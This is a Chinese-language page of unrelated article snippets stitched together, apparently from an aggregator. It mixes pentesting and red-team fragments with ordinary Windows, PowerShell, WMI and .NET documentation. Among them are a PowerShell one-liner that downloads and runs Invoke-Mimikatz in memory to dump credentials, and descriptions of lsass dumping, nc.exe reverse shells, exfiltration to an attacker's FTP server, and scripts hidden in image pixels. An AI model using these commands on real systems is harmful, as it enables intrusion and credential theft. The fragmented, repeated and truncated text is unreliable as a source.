更隐蔽的方法是修改现有合法快捷方式的属性,但是生成具有不同特征的快捷方式可以为代码执行提供灵活性。...默认情况下,此模块将使用写字板图标伪装成可信任的应用程序。 ? 快捷方式的目标字段将使用执行Base64有效负载的PowerShell命令填充。可以将快捷方式转移并移动到启动文件夹中以保持持久性。...Empire-写字板快捷方式快捷方式的目标字段将使用执行Base64有效负载的PowerShell命令填充。可以将快捷方式转移并移动到启动文件夹中以保持持久性。.../pentestlab.exe;或者,该项目包含一个VBS脚本,该脚本可以执行与PowerShell版本相同的操作。...或者,该项目包含一个VBS脚本,该脚本可以执行与PowerShell版本相同的操作。 ?
某些文件类型(如EXE文件)将触发另一个警告对话框。但是通过使用其他可执行文件类型可以轻松避免此对话框。 ? 保护模式IE被禁用用于控件,这确实会阻止显示其他对话框——如UAC对话框。...Poc 下面的PowerShell脚本将尝试创建包含嵌入式Internet Explorer对象的Word文档。该脚本使用Packager对象创建一个嵌入文件的对象,单击该对象将触发文件下载功能。...单击设置action属性的嵌入对象,将导致打开定义的URL。常规URL将在默认浏览器中打开,但文件URL(包括共享文件)将直接打开。...将显示一个警告对话框,但此对话框与其他警告对话框略有不同,如图6所示。此警告对话框对于所有文件类型都是相同的。 ? Forms.HTML:Image.1接受一个src,可用于配置文档中显示的图像。...Poc 以下PowerShell脚本可用于创建具有嵌入的Forms.HTML:Image.1对象的Word文档,单击该对象将导致计算器打开。
) Windows中加载并执行PowerShell脚本 本地加载并执行PowerShell脚本 远程下载并执行PowerShell脚本 Windows中的批处理文件 Windows中快捷键操作 Windows...删除一个文件夹 move 1.txt d:/ 将1.txt文件移动到d盘下 type 123.txt...中加载并执行PowerShell脚本 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...更多的关于PowerShell的用法:PowerShell使用浅析 本地加载并执行PowerShell脚本 在cmd当前目录下有PowerView.ps1脚本,并执行其中的Get-Netdomain模块...)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的配置信息 HKEY_CLASSES_ROOT 管理文件系统,根据windows中安装的应用程序的扩展名,该根键指明其文件类型的名称
其他 Azure 对象(例如用户和组)具有“OnPremSecurityIdentifier”属性,其中列出了对象的本地 SID,但该信息似乎不适用于设备。...点击“Policy”部分下的“Scripts”,进入脚本管理页面: image.png 在这里,我们将添加新的 PowerShell 脚本。...单击“添加”,然后单击“Windows 10:” image.png 这将带您进入“添加 Powershell 脚本”页面。在第一页上,您将输入脚本的名称和简要说明。...为了一个简单的演示,我们现在将坚持使用“Hello World”脚本: image.png 在下一页上,单击文件夹,然后从常用对话窗口中选择您的 PS1。...有两个租户级角色具有将 PowerShell 脚本添加到 Endpoint Manager 的明确能力:“全局管理员”和“Intune 管理员”。
参数时,PowerShell 将显示该 cmdlet 的帮助。 Get-Service -? 通用参数: 参数由 PowerShell 引擎控制, 通用参数的行为方式始终相同。...外部可执行文件,或具有已注册的文件类型处理程序的文件也被归类为命令。...名词 在 PS cmdlet 名称中连字符后面的单词。 名词描述了 cmdlet 在其上进行操作的资源。 参数集 可用于相同的命令中以执行特定操作的一组参数。...脚本模块文件具有 .psm1 文件扩展名。 shell 用于将命令传递到操作系统的命令解释器。 开关参数 一个不带实参的形参。 终止错误 阻止 PS 处理命令的错误。...PS数据文件 具有 .psd1 文件扩展名的文本文件。 PS 将数据文件用于多种用途,例如存储模块清单数据和存储用于脚本国际化的已翻译的字符串。 PS驱动器 一个提供直接访问数据存储的虚拟驱动器。
命名空间 让我们简单回顾一下命名空间是什么: 命名空间结构信息类似于文件系统中文件夹,但是,与物理位置 (例如磁盘上) 不同,它们本质上更具有逻辑 WMI 中的所有命名空间都是 __Namespace...可以实现相同目的: Get-CimInstance -Namespace root -ClassName __Namespace OK,上面已整整齐齐列出来了,那嵌套的名称空间呢?...我们已经看到 root 命名空间下有几个命名空间,只需要编写一个脚本,递归地获取名称空间 (来自 PSMag): Function Get-WmiNamespace { Param (...类,该类具有一个名为 Description 的可写属性。...让我们使用 Set-WmiInstance 将属性名称更新为 PewOS: 使用 Set-CimInstance 也可以实现相同的效果,但这留给读者去探索。 5 结论 哇,又是一篇长文!
/nc.exe" C:\temp\nc.exe Windows 10 和 Server 2019 具有内置 cURL (curl.exe),可用于下载文件,其方式与在 Linux 计算机上使用的方式相同...使用 SimpleHTTPServerWithUpload.py,您仍然可以获得下载文件的常规目录列表,并具有 GUI 上传功能的额外好处,该功能可用于轻松地将文件渗漏回攻击者计算机。...4.2上传文件到攻击者的FTP服务器:cmd.exe 我们对用于将 ftp.txt 文件制作为“PUT”而不是“GET”的 PowerShell 命令进行了相同的更改,我们还将对 cmd.exe 版本进行更改...通过攻击者计算机上的共享,我们实际上可以直接从共享文件夹在受害者上执行文件。例如,我们可以使用共享中的 nc.exe 获取反向 shell,而无需将其复制到受害者。...将PS1 脚本加载到evil-winrm 会话中就像按名称执行任何脚本一样简单。由于-s开关指向我们的脚本目录,因此我们可以双击来查看所有可用的 PS1 脚本。
对Mitre ATT&CK和Red Canary分别整理得出的Top 20技术进行对比分析,我们可以发现有7项技术是重合的,分别为PowerShell、脚本执行、命令行界面、注册表Run Key/ 启动文件夹...这些程序将在用户的上下文中执行,并具有与账户相同的权限级别。 注册表run key和启动文件夹历来都是各类攻击者实现持久化的重要目标。...攻击者仅需要用户级别的权限,并具有写入注册表或将有效负载拖放到启动文件夹的功能。 虽然实现起来相对简单,但非常有效。...针对该攻击技术,可以在持久化机制生命周期的三个不同点上有效地实现检测:安装时、休眠时以及触发时。 在安装时检测run key和启动文件夹项目需要监视特定注册表和文件系统路径的变更情况。...例如,如果要查找wscript.exe,则应查找具有该名称的二进制文件,也应查找具有原始文件名WScript的任何二进制文件。
名称 dotnet-install.ps1| dotnet-install.sh- 用于安装 .NET SDK 和共享运行时的脚本。...描述 这些dotnet-install脚本执行 .NET SDK 的非管理员安装,其中包括 .NET CLI 和共享运行时。有两个脚本: 适用于 Windows 的 PowerShell 脚本。...https : //dot.net/v1/dotnet-install.ps1 脚本行为 两个脚本具有相同的行为。...版本必须指定为由三部分组成的版本号,例如2.1.0. 如果未指定版本,脚本将安装该latest版本。 安装脚本不会更新 Windows 上的注册表。...--help 打印出脚本的帮助。仅适用于 bash 脚本。对于 PowerShell,请使用Get-Help ./dotnet-install.ps1.
在Office 2016和Office 365还添加了其它的安全措施(如GPO等),这样当用户从Internet下载文档时宏将完全被禁用,以及阻止在Packer文件扩展名黑名单列表中的文件类型运行。...POC 以下PowerShell脚本将尝试创建包含嵌入式Internet Explorer对象的Word文档。...该脚本使用Packager对象创建了一个看起来像是嵌入文件的对象,单击该对象将触发文件下载功能。 ? ?...常规URL将在默认浏览器中打开,但文件URL(包括共享文件)将会被直接打开。这将弹出一个警告对话框,但此对话框与其他警告对话框略有不同,如下图所示。 ?...POC 以下PowerShell脚本可用于创建具有嵌入Forms.HTML:Image.1对象的Word文档,单击该对象将打开计算器。 ? ?
du与df命令不同点在于,du命令用于查看文件和目录磁盘的使用空间。...[img] 将c目录移动到a/b/c/d/下。 [img] 将当前目录内容全部移动到/tmp目录中。...chmod命令 chmod命令用于修改文件权限mode,-R参数以递归方式对子目录和文件进行修改。 命令使用示例: 新建名为hello.sh的Shell脚本,该脚本将会输出Hello World。...用ll命令可以看到新建的脚本没有执行权限,其权限用八进制表示为644。[img] 将hello.sh文件增加属主的执行权限。 [img] 将hello.sh文件撤销属主的执行权限。...file命令 file命令描述:该命令用于辨识文件类型。
2 内容速览 Windows 加密简介 在Windows系统中,通常会使用哈希(hash)转化我们存入的密码,哈希是将目标文本转换成具有相同长度的,不可逆的字符串,具体到应用层还有很多不同的分支 Windows...Windows 凭证获取 使用powershell脚本 powershell脚本:[1] https://raw.githubusercontent.com/samratashok/nishang/master...在cmd中使用如下命令,将脚本加载到内存中直接执行 powershell IEX (New-Object Net.WebClient).DownloadString('脚本下载地址');Invoke-Mimikatz..., 主要用于桌面应用开发人员对应用的一些检测处理,我们使用Procdump实现的主要功能是将正在运行的程序生成静态文件 方便我们进行分析操作,我在上述介绍中提过,处理我们密码的程序是lsass.exe,...lsass文件移动到本机中(最好将此文件和mimikatz.exe放在同一个文件夹,如果不是同一个文件夹,需要在猕猴桃中cd到lsass所在的文件夹中) # 载入静态的lsass文件 sekurlsa:
2.外部可执行文件或具有已注册的文件类型处理程序的文件也被归类为命令。...Bypass: 没有任何阻止也没有警告或提示;此执行策略设计用于将PowerShell脚本内置到更大的应用程序中的配置,或者用于以PowerShell为具有自己的安全模型的程序的基础的配置。...名词 在 PS cmdlet 名称中连字符后面的单词。 名词描述了 cmdlet 在其上进行操作的资源。 参数集 可用于相同的命令中以执行特定操作的一组参数。...脚本模块文件具有 .psm1 文件扩展名。 shell 用于将命令传递到操作系统的命令解释器。 开关参数 一个不带实参的形参。 终止错误 阻止 PS 处理命令的错误。...PS数据文件 具有 .psd1 文件扩展名的文本文件。 PS 将数据文件用于多种用途,例如存储模块清单数据和存储用于脚本国际化的已翻译的字符串。 PS驱动器 一个提供直接访问数据存储的虚拟驱动器。
攻击者可以欺骗用户运行含有该漏洞的 PPT 文件,导致获取和当前登录用户相同的代码执行权限。...这样可以绕过很多对内容和文件类型检测对安全工具。...它可用于将 shellcode 注入本机 Windows 应用程序(仅限于 32 位应用程序)。shellcode 可以是你自己写的或者通过框架生成的,比如Metasploit。...https://github.com/Arvanaghi/CheckPlease Invoke-PSImage 这个工具可以将 powershell 脚本嵌入到 PNG 图片的像素中,从而隐藏恶意脚本,...补丁技术包括: 1、附加到文本段,将数据段前移一页或者更多页 2、文本段和数据段之间如果有空白空间可以利用 3、将 stub 附加到数据段并使其可执行 4、将文本段扩展到数据段之后 5、替换一个节点,替换掉
然后让跳板机使用copy命令远程操作,将metasploit生成的payload文件Gamma.exe复制到目标主机DC系统C盘中。 3. 再在目标主机DC上创建一个名称为“backdoor”的服务。...3.WMI会建立一个共享文件夹,用于远程读取命令执行结果。 4.当用户输入命令时,WMI创建进程执行该命令,然后把结果输出到文件,这个文件位于之前创建的共享文件夹中。...5.通过FSO组件访问远程共享文件夹中的结果文件,将结果输出。 6.当结果读取完成时,调用WMI执行命令删除结果文件,最后当WMIEXEC退出时,删除文件共享。...,支持py和exe两种文件类型)。...ProgID不能保证是唯一的,并且与CLSID不同,并非每个类都与ProgID相关联。 AppID -该应用程序标识符用于指定一个的配置或多个COM对象与同一可执行相关联。
1、New-Item 创建新项命令cmdlet New-Item 将创建新项并设置其值。 可创建的项类型取决于项的位置。 例如,在文件系统 New-Item 中创建文件和文件夹。...表示当前操作目录-Value 指定文件内容常用参数介绍 ● -Name:指定新项的名称。...可以指定新项的名称或者指定新项的路径 ● -Path:指定新项的位置的路,如果省略的话表示当前目录,支持多个字符串通过逗号分割 ● -ItemType:指定新项目的指定提供者的类型(File 文件,SymbolLink...还可以通过管道将值传递给 New-Item ● -Confirm:用于创建操作运行cmdlet之前是否需要确认 ● -Force:针对文件夹,不会覆盖,只会返回之前创建的文件夹,针对文件或者注册表会覆盖文件内容...它支持删除许多不同类型的项,包括文件、文件夹、注册表项、变量、别名和函数。
服务决定了计算机的一些功能是否被启用,不同的服务对应的功能不同,通过计算机提供的服务可以有效地实现资源共享。...根据在Windows中安装的应用程序的扩展名,该根键指明其文件类型的名称,相应打开该文件所要调用的程序等等信息。 HKEY_CURRENT_USER 管理系统当前的用户信息。...ARP协议是将IP地址映射为MAC地址的协议,其在协议上使用ARP请求及ARP应答报文来实现。 net view:查看局域网内其他计算机名称 telnet:连接远程终端。...rd file_name:删除文件夹。 ren 原文件名 新文件名:重命名文件名称。...[网络安全] 二十二.Powershell基础入门及常见用法 [网络安全] 二十三.Powershell基础入门之常见语法及注册表 Windows PowerShell 是一种命令行外壳程序和脚本环境,
Link:指定新的符号链接名称。...Target:指定新链接引用的路径(相对或绝对) 如将G盘的123文件夹映射到L盘并重命名为test mklink 硬链接/H和符号链接/D的区别 硬链接只能用于文件,不能用于文件夹,而且硬链接和目标文件必须在同一个分区或者卷中...但是硬链接具有以下一些不同的地方。 (1)硬链接必须引用同一个分区或者卷中的文件,而符号链接可以指向不同分区或者共享文件夹上的文件或者文件夹。...(8)对硬链接进行NTFS权限的修改,会同时影响到目标文件(因为两者等价),而符号链接和目标文件可以设置不同的NTFS权限。...如分别用 mklink /D dird tdir 和 mklink /J dirj tdir 创建 dird、dirj 对相对目录的 tdir 的符号链接和目录联接,之后将 dird、dirj 移动到其它目录下
黄金票据用于伪造TGT,拿到TGT就可以访问域内所有主机 - TGS 允许访问某一项服务的访问票据。TGS票据正常才可以访问对应服务 白银票据用于伪造TGS。 TGT、TGS票据具有时效性。...通过这些策略可以获取更多相关域的信息。 ---- 1.SYSVOL SYSVOL是存储域公共文件服务器副本的共享文件夹,在域中所有的域控制器之间复制。...同时,存放在Sysvol文件夹中的信息会复制到域中所有DC上 域服务器一般都会共享这个文件夹,或者搜索当前机器下的XML文件将包含凭据: 映射驱动(Drives.xml) 数据源(DataSources.xml...---- 2.GPP漏洞利用实例 由域控分发策略到组织单位,然后利用GPP获取敏感信息: 2.1 创建组策略 ①创建组织单位,将需要下发策略的用户移动到此单位。...将该cpassword密码值放到powershell脚本里面然后执行脚本读取得到组策略下发的密码 ? 综上所述:拿到域主机一定要打开访问域策略共享文件夹,可以看到拿到的域主机被下发了哪些策略。
SYSVOL 是 Active Directory 中所有经过身份验证的用户都具有读取权限的域范围共享。...SYSVOL 包含登录脚本、组策略数据和其他需要在有域控制器的任何地方可用的域范围数据(因为 SYSVOL 自动同步并在所有域控制器之间共享)。...其他文件类型也可能具有嵌入式密码(通常为明文),例如 vbs 和 bat。...使用转储凭据横向移动到其他工作站、提升权限并转储更多凭据。...使用Mimikatz转储 LSASS 内存(获取域管理员凭据) Mimikatz 可用于转储 LSASS,然后从不同系统上的 LSASS.dmp 文件中提取登录凭据。
领取专属 10元无门槛券
手把手带您无忧上云